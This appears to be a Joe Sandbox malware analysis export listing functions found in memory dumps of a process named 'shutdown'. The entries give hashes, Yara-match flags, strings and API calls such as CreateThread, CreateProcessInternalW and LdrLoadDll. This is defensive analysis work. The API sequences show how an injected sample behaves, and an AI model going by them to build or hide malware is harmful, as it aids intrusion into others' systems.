                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: a6a1c758f8db942d93be0f7bb720f6c2f24a79f231431542bff81f36ac9268dd
                      • Instruction ID: d285faa72ea34043e841aac9ab0187761267f1666ca8729d2e38943d27e0ea0b
                      • Opcode Fuzzy Hash: a6a1c758f8db942d93be0f7bb720f6c2f24a79f231431542bff81f36ac9268dd
                      • Instruction Fuzzy Hash: 4E900261216544035105B1594418616404E87E0201B55C025E1014590DC62689916126
                      Function 039B2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 7dffcfad72f365600c543fcd83ca442ccb00454850cf8a49ad74529947f2d8f3
                      • Instruction ID: 3d2a128424eee80d3aa1078b1e5b7fc5bbdb93f5d2e4dcaf9701147a6a80e041
                      • Opcode Fuzzy Hash: 7dffcfad72f365600c543fcd83ca442ccb00454850cf8a49ad74529947f2d8f3
                      • Instruction Fuzzy Hash: D5900435335544031105F55D070C50700CFC7D5351355C035F1015550CD733CD715133
                      Function 039B2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: c6ac242c7091a8cebe3066bcb702d774396d72a88afe12b6684d79dc25e9b3ed
                      • Instruction ID: ab3c01159cb8aa2b67941f9bcee30c528bd7771be4606729984563e541a08b9e
                      • Opcode Fuzzy Hash: c6ac242c7091a8cebe3066bcb702d774396d72a88afe12b6684d79dc25e9b3ed
                      • Instruction Fuzzy Hash: BF900225235544021145F559060850B048997D6351395C019F1416590CC72289655322
                      Function 039B2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: fcd117ed6000242af1afb4bcb4896aead337ed17bc41925d910ba4cccc4ea392
                      • Instruction ID: ad3fae99a4365638a340a32ed309b6019e91e9dd26bf14fe2add51d85049016a
                      • Opcode Fuzzy Hash: fcd117ed6000242af1afb4bcb4896aead337ed17bc41925d910ba4cccc4ea392
                      • Instruction Fuzzy Hash: 4F900221615544425140B16988489064049ABE1211755C125A0998550D865A89655666
                      Function 039B2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 3742f99966de03e774aaa5eae18da0d946d52952cf0464ad081293e036cbcbb1
                      • Instruction ID: ccfb5e2e4363ca40977f363ebd4941e7dbe5d2fa0269d57652eefe31264813c6
                      • Opcode Fuzzy Hash: 3742f99966de03e774aaa5eae18da0d946d52952cf0464ad081293e036cbcbb1
                      • Instruction Fuzzy Hash: C7900221225D4442E200B5694C18B07004987D0303F55C119A0154554CCA1689615522
                      Function 039B2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 31c46bc738b9d10c798bdcf6c8fb7900d4cab593981fa3d44ba82bfc2d3fa855
                      • Instruction ID: 1c590cd79144b4244da2c392dfca20e2063f1b653b53ddee27f677f56957d75d
                      • Opcode Fuzzy Hash: 31c46bc738b9d10c798bdcf6c8fb7900d4cab593981fa3d44ba82bfc2d3fa855
                      • Instruction Fuzzy Hash: 0190026135554842E100B1594418B060049C7E1301F55C019E1064554D871ACD526127
                      Function 039B2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: b62f87764b79f734300bea37d493843bb65db4b5c998d1b5c1e9f34b17f202ea
                      • Instruction ID: 6ef5a734427a7db851825dac17b51051aebdcd73435c9968c18e291902a19116
                      • Opcode Fuzzy Hash: b62f87764b79f734300bea37d493843bb65db4b5c998d1b5c1e9f34b17f202ea
                      • Instruction Fuzzy Hash: 8C90022161554902E101B1594408616004E87D0241F95C026A1024555ECB268A92A132
                      Function 039B2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 5011a82fe51203e6ee4cf8c27e64f170c96474253bdc076612fff7302cc61f46
                      • Instruction ID: 2c6dea45e30a398889ec8d98b4d8e95308db8fc657c634c47c4b3b0a2f65e0d8
                      • Opcode Fuzzy Hash: 5011a82fe51203e6ee4cf8c27e64f170c96474253bdc076612fff7302cc61f46
                      • Instruction Fuzzy Hash: 9490026121594803E140B5594808607004987D0302F55C015A2064555E8B2A8D516136
                      Function 039B2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 83f7eb47499b23a71c785f69975a5a1ce8541b6b79ed6afd8637c0fbdbd2a4b1
                      • Instruction ID: 2efd78537e658bbd208abab4bc45f2861804c77e1be337775b4375513659a67c
                      • Opcode Fuzzy Hash: 83f7eb47499b23a71c785f69975a5a1ce8541b6b79ed6afd8637c0fbdbd2a4b1
                      • Instruction Fuzzy Hash: 4C900221256585526545F1594408507404A97E0241795C016A1414950C86279956D622
                      Function 039B2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 4cea1f784980aff276382f4971cadf80b3026d82517414fa1244da04160cb025
                      • Instruction ID: 76e4bb39f4264c978b462d6ec1be446e1c7fc559ab12eb0c435f837d12186876
                      • Opcode Fuzzy Hash: 4cea1f784980aff276382f4971cadf80b3026d82517414fa1244da04160cb025
                      • Instruction Fuzzy Hash: F290023121554813E111B1594508707004D87D0241F95C416A0424558D97578A52A122
                      Function 039B2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: e2d6652fbaba0f9498af12b74e0b19fecfb35e77658da66c79aa18520f6ea397
                      • Instruction ID: 474ec9ca598a6be11ccaea21e637a9e55605103ec44a0917493b611b74636efb
                      • Opcode Fuzzy Hash: e2d6652fbaba0f9498af12b74e0b19fecfb35e77658da66c79aa18520f6ea397
                      • Instruction Fuzzy Hash: 4590022922754402E180B159540C60A004987D1202F95D419A0015558CCA1689695322
                      Function 039B2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 1559b2fd704d47c78065b338e45a55bbbe09f88aca71693c1b3daa9eecc97276
                      • Instruction ID: 517c3c1f944d1c9c208c0c7cc0637bf511f749bf7c229b43a32132704ced77e9
                      • Opcode Fuzzy Hash: 1559b2fd704d47c78065b338e45a55bbbe09f88aca71693c1b3daa9eecc97276
                      • Instruction Fuzzy Hash: 3890022131554403E140B159541C6064049D7E1301F55D015E0414554CDA1689565223
                      Function 039B2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 33c23560ab9c5efc91b02a8242bfb80e8df71ef24fe3eb0ccb5b5c0be184c525
                      • Instruction ID: 9bedd2810ebae4f3fcfa0dde0e19d5f013a5f92e24a95f57d8c95e4903a6b881
                      • Opcode Fuzzy Hash: 33c23560ab9c5efc91b02a8242bfb80e8df71ef24fe3eb0ccb5b5c0be184c525
                      • Instruction Fuzzy Hash: 4D90023121554802E100B599540C646004987E0301F55D015A5024555EC76689916132
                      Function 039B2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: c3b754a91323d119b13720136250c9395457320753aeabbe9718767821d5faab
                      • Instruction ID: 7171124e305b48344b3e35df9ce6ff978f6e9fc997fe1dfb9f30bd8bdf8ac42b
                      • Opcode Fuzzy Hash: c3b754a91323d119b13720136250c9395457320753aeabbe9718767821d5faab
                      • Instruction Fuzzy Hash: 6F9002312155CC02E110B159840874A004987D0301F59C415A4424658D879689917122
                      Function 039B2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 9f85e1fa3f1c7d5c9538e11d1e9ecc374f1d541ff24235f0ea3b6c737300ffa9
                      • Instruction ID: 60b53f15e1125450bdbbb2af12e44dbdc9109de79503a3e853cc371bd79cf320
                      • Opcode Fuzzy Hash: 9f85e1fa3f1c7d5c9538e11d1e9ecc374f1d541ff24235f0ea3b6c737300ffa9
                      • Instruction Fuzzy Hash: D090023121554C42E100B1594408B46004987E0301F55C01AA0124654D8716C9517522
                      Function 039B35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: c928fdde73c3765d68dbfe0f904bdc1082e08b12f2ca4126cf0edc96c4151ef8
                      • Instruction ID: adea4644ca7f9cd8a447dc37a443f4352f722ef4c40a82e623f0ad0c3e63ba17
                      • Opcode Fuzzy Hash: c928fdde73c3765d68dbfe0f904bdc1082e08b12f2ca4126cf0edc96c4151ef8
                      • Instruction Fuzzy Hash: 7490023161964802E100B1594518706104987D0201F65C415A0424568D87968A5165A3
                      Function 039B39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: ca53c3800d5bb8d5dcc4bb3383f16a1f7c3a4da90b363b6a1a7abf9b58f189f1
                      • Instruction ID: bb0d25f9184b2db0be912d85965f8ef624ae6f07ac16213cb065b83e9717ce10
                      • Opcode Fuzzy Hash: ca53c3800d5bb8d5dcc4bb3383f16a1f7c3a4da90b363b6a1a7abf9b58f189f1
                      • Instruction Fuzzy Hash: 3590022125959502E150B15D44086164049A7E0201F55C025A0814594D865689556222
                      Function 03240E48 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 462 3240e48-3240e4a 463 3240e4c-3240e4d 462->463 464 3240ead-3240eca 462->464 467 3240e4f 463->467 468 3240e0a-3240e0b 463->468 465 3240f34-3240f42 464->465 466 3240ecc-3240ecd 464->466 471 3240f48-3240f7a call 3231410 call 3251580 465->471 472 3240f43 call 32448d0 465->472 469 3240f0e-3240f43 call 325a240 call 325ac50 call 32448d0 466->469 470 3240ecf-3240ee2 466->470 473 3240e64-3240e70 467->473 474 3240e51-3240e5d 467->474 469->471 470->469 484 3240f7c-3240f8b PostThreadMessageW 471->484 485 3240f9a-3240fa0 471->485 472->471 473->464 474->473 484->485 487 3240f8d-3240f97 484->487 487->485
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 3y36225$3y36225
                      • API String ID: 0-273086695
                      • Opcode ID: a4591cf4fa2a2146a6b4ca358de84c6a80a448c5c9c76962448731accce70402
                      • Instruction ID: a95ee46456ceb34115a131f55f5420bcc02417355bc9ecc89d241d615f9db62f
                      • Opcode Fuzzy Hash: a4591cf4fa2a2146a6b4ca358de84c6a80a448c5c9c76962448731accce70402
                      • Instruction Fuzzy Hash: 0731ABB081534A7AD701DAB4CC41DEFFF6CDF42260F04C195EA10AB241D2744A96CBE1
                      Function 03240F10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • PostThreadMessageW.USER32(3y36225,00000111,00000000,00000000), ref: 03240F87
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: MessagePostThread
                      • String ID: 3y36225$3y36225
                      • API String ID: 1836367815-273086695
                      • Opcode ID: b636840553059b66cf61889193f296b746fdceec7e56f9360eb77bb6e0130ae5
                      • Instruction ID: 4fbf21e93886596191e27201b094a378b6e995ba79fef4844a043b978ed75e01
                      • Opcode Fuzzy Hash: b636840553059b66cf61889193f296b746fdceec7e56f9360eb77bb6e0130ae5
                      • Instruction Fuzzy Hash: A001C0B6D4130D7AEB01EAE08C81DEFBB7CEF41294F058164FA04AB140E6785E468BE1
                      Function 03252E50 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                      Download Yara Rule
                      APIs
                      • Sleep.KERNELBASE(000007D0), ref: 03252F1B
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID: net.dll$wininet.dll
                      • API String ID: 3472027048-1269752229
                      • Opcode ID: 72cb69e589b892c01563f413b3cf65d0fa6ca5d86aef188049afa5280b4bd624
                      • Instruction ID: ef5bdd6dc0f10008c54901914cd3f35799a55e85ecbbee40ccea64811de48321
                      • Opcode Fuzzy Hash: 72cb69e589b892c01563f413b3cf65d0fa6ca5d86aef188049afa5280b4bd624
                      • Instruction Fuzzy Hash: 89316DB5611705ABD714DF64DC85FE7BBB8EB48704F04891DBA1D9B280D6B0B6848BA0
                      Function 0324EF75 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 104COMMON
                      Download Yara Rule
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 0324EF97
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: Initialize
                      • String ID: @J7<
                      • API String ID: 2538663250-2016760708
                      • Opcode ID: 57100c11c2c74324ef82bf3a0ff969db338d334605395a616696048de9bcf25b
                      • Instruction ID: 76df7ef8af98454b2d5021de3bb4acc826859b1a01c6ecddbc109a682a8a95d9
                      • Opcode Fuzzy Hash: 57100c11c2c74324ef82bf3a0ff969db338d334605395a616696048de9bcf25b
                      • Instruction Fuzzy Hash: EB3162B5A1020AAFDB10DFD8C8809EFB7B9FF88304B148559E505EB214D771EE45CBA0
                      Function 0324EF80 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                      Download Yara Rule
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 0324EF97
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: Initialize
                      • String ID: @J7<
                      • API String ID: 2538663250-2016760708
                      • Opcode ID: 9d2cfcdf1ffe3e67a65421843a7bad9a0ebaa40a1ace3f2a3fe73cb335089e24
                      • Instruction ID: 5896a4be55560b84ef7467cd9d718d54c28a7d9c7734c44990d97363a67dbce5
                      • Opcode Fuzzy Hash: 9d2cfcdf1ffe3e67a65421843a7bad9a0ebaa40a1ace3f2a3fe73cb335089e24
                      • Instruction Fuzzy Hash: 893132B5A1060AAFDB04DFD8D8809EFB7B9FF88304B108559E905EB214D775EE45CBA0
                      Function 032448D0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03244942
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: 942a60e6e87afde0c01754d0e8ffe965a11c5306625b664f60415aee2c061237
                      • Instruction ID: e8b23adb66741744406a83ddacb1e6c2d898e1cdf7d269c4eb3d30e9bb49e7b6
                      • Opcode Fuzzy Hash: 942a60e6e87afde0c01754d0e8ffe965a11c5306625b664f60415aee2c061237
                      • Instruction Fuzzy Hash: 2B015EB9E1020EABDF10EAE5DC45F9DB3789B14208F0442A5AD099B240F670E784CB91
                      Function 032586C0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                      Download Yara Rule
                      APIs
                      • CreateProcessInternalW.KERNELBASE(00000044,00000000,00000000,0000000C,00000000,0324B03C,?,?,?,00000000,?,0324B03C,00000000,0000000C,00000000,00000000), ref: 03258723
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateInternalProcess
                      • String ID:
                      • API String ID: 2186235152-0
                      • Opcode ID: c645de62c93a6ff0c5e61469aa2b5a2d495b08286b884989e28a46b387e334de
                      • Instruction ID: 078d2f0fb33be25e7421d83d4afd14f7d0f4a6e444328cbfdcf8be9387bb87cf
                      • Opcode Fuzzy Hash: c645de62c93a6ff0c5e61469aa2b5a2d495b08286b884989e28a46b387e334de
                      • Instruction Fuzzy Hash: B901C0B2214208BBCB44DE89DC80EEB77ADAF8D754F008108BA09E7240D630FC518BA4
                      Function 03239720 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                      Download Yara Rule
                      APIs
                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03239765
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateThread
                      • String ID:
                      • API String ID: 2422867632-0
                      • Opcode ID: 2ac34e68cfbe189370e557a7f5bc0fcf54cd68683431eb97cbda2f41cd0c74f5
                      • Instruction ID: 0e83f9b76c6562beaeeb4128a6d81d7320ff582d248ad4f9a1dc32924c0cae91
                      • Opcode Fuzzy Hash: 2ac34e68cfbe189370e557a7f5bc0fcf54cd68683431eb97cbda2f41cd0c74f5
                      • Instruction Fuzzy Hash: EAF0657739030436E720A5A99C02FD7B74C8B85671F140025FB0DEF2C0D9F2B58146E5
                      Function 032448C3 Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMON
                      Download Yara Rule
                      APIs
